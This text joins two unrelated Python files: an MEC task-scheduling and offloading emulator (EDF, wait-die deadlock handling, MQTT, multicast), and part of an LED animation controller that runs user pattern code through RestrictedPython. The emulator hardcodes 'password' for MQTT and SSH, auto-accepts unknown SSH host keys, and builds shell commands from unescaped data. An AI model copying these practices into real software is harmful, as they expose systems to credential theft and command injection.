def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
print('sending stop alert')
run = 0
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
print('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
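# Illustrative example (hedged) of task_time_map(): jobs are emitted round-robin
# in the given order until every wcet is used up, e.g.
#   task_time_map(['t2', 't1'], {'t1': {'wcet': 2}, 't2': {'wcet': 1}})
#   returns ['t2', 't1', 't1'] (and decrements the wcet values in place).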
total_received_task = 0
def edf():
global total_received_task
t_lcm = lcm([tasks[i]['period'] for i in tasks])
t_dead = {i: tasks[i]['deadline'] for i in tasks}
sorted_dead = sorted(t_dead.items(), key=lambda kv: (kv[1], kv[0]))
# print(sorted_dead)
ready_task = []
for i in sorted_dead:
period = tasks[i[0]]['period']
# print('lcm: ', t_lcm, ' period: ', period)
t_range = int(t_lcm / period)
last_dead = 0
for j in range(t_range):
ready_task.append((i[0], last_dead + tasks[i[0]]['deadline']))
last_dead += period
ready_task = sorted(ready_task, key=lambda t: t[1])
print(ready_task)
t_time_ = 0
schedule = []
missed = []
register = {i: 0 for i in tasks.keys()} # {ti : amount executed}
for i in ready_task:
if (t_time_ // tasks[i[0]]['period']) + 1 <= register[i[0]]:
while (t_time_ // tasks[i[0]]['period']) + 1 <= register[i[0]]:
t_time_ += 1
# schedule.append(('idle', t_time))
if (t_time_ // tasks[i[0]]['period']) + 1 > register[i[0]]:
if t_time_ + tasks[i[0]]['wcet'] <= i[1]:
register[i[0]] += 1
t_time_ += tasks[i[0]]['wcet']
schedule.append(i[0])
else:
print('Deadline missed: ', i)
missed.append(i[0])
# print('s : ', schedule)
# print('r: ', register)
if len(missed) > 0:
# print('missed deadline: ', missed)
cooperative_mec(missed)
_edf_ = task_time_map(schedule, tasks)
total_received_task += len(_edf_)
return _edf_
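# Hedged summary of edf() above: each task is expanded into one job per period up
# to the hyperperiod lcm(periods), jobs are sorted by absolute deadline, and any
# job that cannot finish its wcet before that deadline is counted as missed and
# handed to cooperative_mec() for offloading.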
# generate execution sequence
def wait_die(processes, avail, n_need, allocat):
global deadlock
offload = []
# To store execution sequence
exec_seq = []
    # Work list tracks each process: 0 = not yet considered, 'w' = waiting, 1 = done
work = [0] * len(processes)
# While all processes are not finished
# or system is not in safe state.
    while 'w' in work or 0 in work:
if 0 in work:
ind = work.index(0)
i = processes[ind]
elif 'w' in work:
# print('wk: ', work)
ind = work.index('w')
i = processes[ind]
else:
break
# print('comparing| process: ', i, _need[i], 'work: ', avail)
if not (False in list(np.greater_equal(avail, n_need[i]))):
exec_seq.append(i)
avail = np.add(avail, allocat[i])
work[ind] = 1
# print('added: ', exec_seq)
else:
a = list(set(processes) - set(exec_seq) - set(offload))
n = {}
for j in a:
n[j] = sum(allocat[j])
_max = max(n, key=n.get)
# print('work: ', work, 'need: ', _need[_max])
if processes.index(_max) > processes.index(i): # if true, i is older
# if process is already waiting then offload process
if work[ind] == 'w':
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
# print('offload reentry: ', i, offload)
else:
# wait put process to waiting
work[processes.index(i)] = 'w'
# print('waiting: ', i)
else:
# abort i
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
# print('offload: ', i)
if len(offload) > 0:
# print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
# print('Execution seq: ', exec_seq)
return exec_seq
def get_exec_seq(pro):
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return wait_die(processes, avail, n_need, allot)
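# Hedged note on the wait-die scheme in wait_die() above: when a task's need
# cannot be satisfied it is compared, by position in `processes`, with the
# remaining task holding the largest allocation; an older task is allowed to
# wait once, while a younger or already-waiting task releases its allocation
# and is offloaded via cooperative_mec(), which prevents a circular wait.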
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
    # broadcast waiting time = total waiting time / 2; the full average waiting time might be too tight
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
def compare_local_mec(list_seq):
time_compare_dict = {i: t_time[i.split('_')[0]][1] > list_seq[i] for i in list_seq}
print('local vs MEC comparison: ', time_compare_dict)
execute_mec = []
execute_locally = []
for i in time_compare_dict:
if time_compare_dict[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
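# Illustrative example (hedged) of calculate_mov_avg() with a hypothetical MEC ip:
#   calculate_mov_avg('10.0.0.9', 0.8) -> 0.8 when no samples are stored yet;
#   once mec_waiting_time['10.0.0.9'] == [0.8], a new sample 0.4 gives
#   ((2 - 1) * 0.8 + 0.4) / 2 = 0.6, per the cumulative-average recurrence above.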
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
                        address[0]))  # calculate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0
offload_check = [0, 0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list, outward_mec
global offload_check
while True:
if stop():
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
outward_mec += 1
offload_check[0] += 1
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
offload_check[1] += len(o)
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results edf+wait-die {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_16_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_16_{mec_no} = {mec_rtt} \ncpu{_id_}_16_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_16_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_16_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_16_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_16_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_16_{mec_no} = {deadlock} \nmemory{_id_}_16_{mec_no} = {memory}" \
f"\ntask_received = {total_received_task} \nsent_t = {clients_record}" \
f"\ncooperate{_id_}_16_{mec_no} = {cooperate} \ntask_record{_id_}_16_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_16_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_16_{mec_no} = {offload_check}"
list_result = [
f"\nwt{_id_}_16_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_16_{mec_no} = {mec_rtt} \ncpu{_id_}_16_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_16_{mec_no} = {_off_mec} \noff_cloud{_id_}_16_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_16_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_16_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_16_{mec_no} = {deadlock} \nmemory{_id_}_16_{mec_no} = {memory}",
f"\ntask_received{_id_}_16_{mec_no} = {total_received_task} \nsent_t{_id_}_16_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_16_{mec_no} = {cooperate} \ntask_record{_id_}_16_{mec_no} = {task_record} "
f"\noutward_mec{_id_}_16_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_16_{mec_no} = {offload_check}"
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_16_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_16_{mec_no}datap.py"
os.system(cmd)
else:
os.system(f'mkdir -p {path_}')
cmd = f"echo '' > {path_}{_id_}_16_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_16_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_16_{mec_no}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}{_id_}_16_{mec_no}datal.py'
file_.write(i)
os.system(cmd)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_16_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:{send_path}"])
send_result(hosts['osboxes-0'], list_result)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
run = 1  # run flag: worker loops keep running while run == 1; set to 0 when the broker sends 'stop'
def start_loop():
global _loc
global tasks
global t_time
global node_id
global run
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
print('algorithm is starting....')
print('========= Waiting for tasks ==========')
while run == 1:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('EDF List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
list_seq = get_exec_seq(edf())
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
print('\nSending to cooperative platform')
if len(compare_result[0]) > 0:
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
_time_ = dt.datetime.now()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(.4)
except KeyboardInterrupt:
print('\nProgramme Terminated')
            stop = True  # signal helper threads to stop before joining
for th in threads_:
th.join()
time.sleep(1)
print('done')
break
print('algo stopped!')
run = 1
stop = True
time.sleep(20)
for th in threads_:
th.join()
def run_me(hosts_, mec_no_, cloud_ip_, send_path, broker_ip_): # call this from agent
global discovering
global hosts
global mec_no
global host_ip
global cloud_ip
global my_algo
global broker_ip
print('mec ip: ', ip_address())
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
hosts = hosts_
mec_no = mec_no_
cloud_ip = cloud_ip_
broker_ip = broker_ip_
host_ip = ip_address()
print('MEC Details: ', hosts)
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
start_loop()
print('saving data')
save_and_send(send_path)
print('send alert to control')
time.sleep(r.uniform(1, 30))
_client.publish('control/control', pickle.dumps(['stop', ip_address()]))
print('Terminating process')
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
def main():
# (hosts_, mec_no_, cloud_ip_, send_path, broker_ip_)
parser = argparse.ArgumentParser()
parser.add_argument('--hosts', type=str, help="{hostname: 'ip address', ...} of all mec")
parser.add_argument('--mec_no', type=int, default=1.0, help='Number of MEC nodes')
parser.add_argument('--cloud_ip', type=str, help="cloud ip address")
parser.add_argument('--s_path', type=str, default='/home/mec/result/python', help='Path to send result to')
parser.add_argument('--b_ip', type=str, help='Broker ip address')
args = parser.parse_args()
h_hosts = ast.literal_eval(args.hosts)
run_me(hosts_=h_hosts, mec_no_=args.mec_no, cloud_ip_=args.cloud_ip, send_path=args.s_path, broker_ip_=args.b_ip)
if __name__ == '__main__':
main()
|
animationcontroller.py
|
# led-control WS2812B LED Controller Server
# Copyright 2021 jackw01. Released under the MIT License (see LICENSE for details).
import math
import random
import time
import traceback
import RestrictedPython
from threading import Event, Thread
from ledcontrol.controlclient import ControlClient
import ledcontrol.animationpatterns as animpatterns
import ledcontrol.colorpalettes as colorpalettes
import ledcontrol.driver as driver
import ledcontrol.utils as utils
class RepeatedTimer:
'Repeat function call at a regular interval'
def __init__(self, interval, function, *args, **kwargs):
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.count = 0
self.wait_time = 0
self.last_start = time.perf_counter()
self.last_measurement_c = 0
self.last_measurement_t = 0
self.perf_avg = 0
self.event = Event()
self.thread = Thread(target=self.target, daemon=True)
def start(self):
'Starts the timer thread'
self.thread.start()
def target(self):
'Waits until ready and executes target function'
while not self.event.wait(self.wait_time):
self.last_start = time.perf_counter()
self.function(*self.args, **self.kwargs)
self.perf_avg += (time.perf_counter() - self.last_start)
self.count += 1
if self.count % 100 == 0:
print('Average execution time (s): {}'.format(self.perf_avg / 100))
print('Average speed (cycles/s): {}'.format(self.get_rate()))
self.perf_avg = 0
# Calculate wait for next iteration
self.wait_time = self.interval - (time.perf_counter() - self.last_start)
if (self.wait_time < 0):
self.wait_time = 0
def get_rate(self):
'Returns current rate in cycles per second'
result = ((self.count - self.last_measurement_c) /
(self.last_start - self.last_measurement_t))
self.last_measurement_c = self.count
self.last_measurement_t = self.last_start
return result
def stop(self):
'Stops the timer thread'
self.event.set()
self.thread.join()
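# Illustrative usage sketch (hedged, not executed here): RepeatedTimer runs the
# target on a daemon thread at a fixed interval, subtracting the call's own
# duration from the next wait, e.g.
#   timer = RepeatedTimer(1.0 / 60, print, 'tick')  # ~60 calls per second
#   timer.start()
#   ...
#   timer.stop()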
class AnimationController:
def __init__(self, led_controller, refresh_rate, led_count,
mapping_func,
led_color_correction):
self.led_controller = led_controller
self.refresh_rate = refresh_rate
self.led_count = led_count
self.mapping_func = mapping_func
# Initialize prev state arrays
self.reset_prev_states()
# Map led indices to normalized position vectors
self.mapped = [self.mapping_func(i) for i in range(self.led_count)]
# Check mapping dimensions to simplify loop if possible
self.mapping_uses_x_only = True
for point in self.mapped:
if point.y != 0:
self.mapping_uses_x_only = False
# Create lists used to cache current mapping
# so it doesn't have to be recalculated every frame
self.primary_mapping = []
self.secondary_mapping = []
# Used to render main slider/select list
self.params = {
'brightness': 0.15,
'color_temp': 6500,
'gamma': 1.0,
'saturation': 1.0,
'primary_pattern': 0,
'primary_speed': 0.2,
'primary_scale': 1.0,
'secondary_pattern': 0,
'secondary_speed': 0.2,
'secondary_scale': 1.0,
'palette': 0,
'direct_control_mode': 0,
}
# Lookup dictionary for pattern functions used to generate select menu
self.pattern_functions = {}
# Initialize primary patterns
for k, v in animpatterns.default.items():
self.set_pattern_function(k, v['source'])
# Lookup dictionary for secondary pattern functions
self.secondary_pattern_functions = animpatterns.default_secondary
# Color palette used for animations
self.palette_table_size = 1000
self.palettes = dict(colorpalettes.default)
self.calculate_palette_table()
# Set default color temp
self.correction_original = led_color_correction
self.calculate_color_correction()
# Set default mapping
self.calculate_mappings()
# Prepare to start
self.start = time.perf_counter()
self.time = 0
self.update_needed = True # Is the LED state going to change this frame?
self.control_client = ControlClient()
def compile_pattern(self, source):
'Compiles source string to a pattern function with restricted globals'
def getitem(obj, index):
if obj is not None and type(obj) in (list, tuple, dict):
return obj[index]
raise Exception()
def getiter(obj):
return obj
restricted_globals = {
'__builtins__': RestrictedPython.Guards.safe_builtins,
'_print_': RestrictedPython.PrintCollector,
'_getattr_': RestrictedPython.Guards.safer_getattr,
'_getitem_': getitem,
'_getiter_': getiter,
'_write_': RestrictedPython.Guards.full_write_guard,
'math': math,
'random': random,
'palette': self.get_palette_color,
'palette_length': self.get_palette_length,
'hsv': animpatterns.ColorMode.hsv,
'rgb': animpatterns.ColorMode.rgb,
'clamp': utils.clamp,
'wave_pulse': driver.wave_pulse,
'wave_triangle': driver.wave_triangle,
'wave_sine': driver.wave_sine,
'wave_cubic': driver.wave_cubic,
'plasma_sines': driver.plasma_sines,
'plasma_sines_octave': driver.plasma_sines_octave,
'perlin_noise_3d': driver.perlin_noise_3d,
'impulse_exp': utils.impulse_exp,
'fract': utils.fract,
'blackbody_to_rgb': driver.blackbody_to_rgb,
'blackbody_correction_rgb': driver.blackbody_correction_rgb,
}
restricted_locals = {}
arg_names = ['t', 'dt', 'x', 'y', 'prev_state']
results = RestrictedPython.compile_restricted_exec(source)
warnings = list(results.warnings)
for name in results.used_names:
if name not in restricted_globals and name not in arg_names:
warnings.append(f'NameError: name \'{name}\' is not defined')
if results.code:
exec(results.code, restricted_globals, restricted_locals)
return results.errors, warnings, restricted_locals['pattern']
else:
return results.errors, warnings, None
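    # Hedged example of the source string compile_pattern() expects: the restricted
    # code must define pattern(t, dt, x, y, prev_state) and return a (color, mode)
    # pair built from the names exposed in restricted_globals, e.g.
    #   def pattern(t, dt, x, y, prev_state):
    #       return palette(t + x), hsv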
def reset_prev_states(self):
'Reset previous animation state lists'
blank = [((0, 0, 0), 0) for i in range(self.led_count)]
self.primary_prev_state = blank[:]
self.secondary_prev_state = blank[:]
def calculate_color_correction(self):
'Calculate and store color temperature correction'
rgb = driver.blackbody_to_rgb(self.params['color_temp'])
c = [self.correction_original[0] * int(rgb[0] * 255) // 255,
self.correction_original[1] * int(rgb[1] * 255) // 255,
self.correction_original[2] * int(rgb[2] * 255) // 255]
self.correction = (c[0] << 16) | (c[1] << 8) | c[2]
def calculate_mappings(self):
'Calculate and store spatial mapping values with current scale'
p = []
s = []
if self.params['primary_scale'] != 0:
for i in range(self.led_count):
# Calculate scale components to determine animation position
# scale component = position / scale (pattern length in units)
# One cycle is a normalized input value's transition from 0 to 1
p.append((
(self.mapped[i][0] / self.params['primary_scale']) % 1,
(self.mapped[i][1] / self.params['primary_scale']) % 1
))
else:
p = [(0, 0) for i in range(self.led_count)]
if self.params['secondary_scale'] != 0:
for i in range(self.led_count):
s.append((
(self.mapped[i][0] / self.params['secondary_scale']) % 1,
(self.mapped[i][1] / self.params['secondary_scale']) % 1
))
else:
s = [(0, 0) for i in range(self.led_count)]
self.primary_mapping = p
self.secondary_mapping = s
def set_param(self, key, value):
'Set an animation parameter'
self.params[key] = value
self.update_needed = True
if key == 'color_temp':
self.calculate_color_correction()
elif key == 'primary_scale' or key == 'secondary_scale':
self.calculate_mappings()
elif key == 'palette':
self.calculate_palette_table()
def set_pattern_function(self, key, source):
'Update the source code and recompile a pattern function'
errors, warnings, pattern = self.compile_pattern(source)
if len(errors) == 0:
self.pattern_functions[key] = pattern
elif key not in self.pattern_functions:
self.pattern_functions[key] = animpatterns.blank
return errors, warnings
def calculate_palette_table(self):
'Set the color palette and recalculate the lookup table'
palette = self.palettes[self.params['palette']]
palette_table = []
sector_size = 1.0 / (len(palette['colors']) - 1)
for i in range(self.palette_table_size):
f = i / self.palette_table_size
sector = math.floor(f / sector_size)
f = f % sector_size / sector_size
c1, c2 = palette['colors'][sector], palette['colors'][sector + 1]
# Allow full spectrum if extremes are 0 and 1 in any order
# otherwise pick shortest path between colors
h1, h2 = c2[0] - c1[0], c2[0] - 1.0 - c1[0]
palette_table.append((
f * (h1 if abs(h1) < abs(h2) or h1 == 1.0 else h2) + c1[0],
f * (c2[1] - c1[1]) + c1[1],
f * (c2[2] - c1[2]) + c1[2],
))
self.palette_table = palette_table
self.palette_length = len(palette['colors'])
def get_palette_color(self, t):
'Get color from current palette corresponding to index between 0 and 1'
return self.palette_table[int(t * self.palette_table_size) % self.palette_table_size]
def get_palette_length(self):
'Get length of current palette color array'
return self.palette_length
def set_palette(self, key, value):
'Update palette'
self.palettes[key] = value
def delete_palette(self, key):
'Delete palette'
del self.palettes[key]
def begin_animation_thread(self):
'Start animating'
self.timer = RepeatedTimer(1.0 / self.refresh_rate, self.update_leds)
self.timer.start()
def update_leds(self):
'Determine time, render frame, and display'
last_t = self.time
self.time = self.timer.last_start - self.start
delta_t = self.time - last_t
if self.update_needed:
# Begin render
pattern_1 = self.pattern_functions[self.params['primary_pattern']]
pattern_2 = self.secondary_pattern_functions[self.params['secondary_pattern']]
# Calculate times
# Reset time every day to prevent strange floating point math issues
time_2 = self.time % 86400
# time component = time (s) * speed (cycle/s)
primary_time = time_2 * self.params['primary_speed']
primary_delta_t = delta_t * self.params['primary_speed']
secondary_time = time_2 * self.params['secondary_speed']
secondary_delta_t = delta_t * self.params['secondary_speed']
mode = animpatterns.ColorMode.hsv
try:
# Determine current pattern mode
c, mode = pattern_1(0, 0.1, 0, 0, (0, 0, 0))
# Run primary pattern to determine initial color
# State is an array of (color, secondary_value) pairs
s_1 = [(pattern_1(primary_time,
primary_delta_t,
self.primary_mapping[i][0],
self.primary_mapping[i][1],
self.primary_prev_state[i][0])[0],
1) for i in range(self.led_count)]
self.primary_prev_state = s_1
# Run secondary pattern to get new brightness and modify color
if pattern_2 is None:
s_2 = s_1
else:
s_2 = [pattern_2(secondary_time,
secondary_delta_t,
self.secondary_mapping[i][0],
self.secondary_mapping[i][1],
self.secondary_prev_state[i],
s_1[i][0]) for i in range(self.led_count)]
self.secondary_prev_state = s_2
# Direct control mode override
if self.params['direct_control_mode']:
s_2 = self.control_client.get_frame(self.led_count)
mode = animpatterns.ColorMode.hsv
except Exception as e:
msg = traceback.format_exception(type(e), e, e.__traceback__)
print(f'Pattern execution: {msg}')
s_2 = [((0, 0, 0), 0) for i in range(self.led_count)]
# Write colors to LEDs
if mode == animpatterns.ColorMode.hsv:
self.led_controller.set_all_pixels_hsv_float(
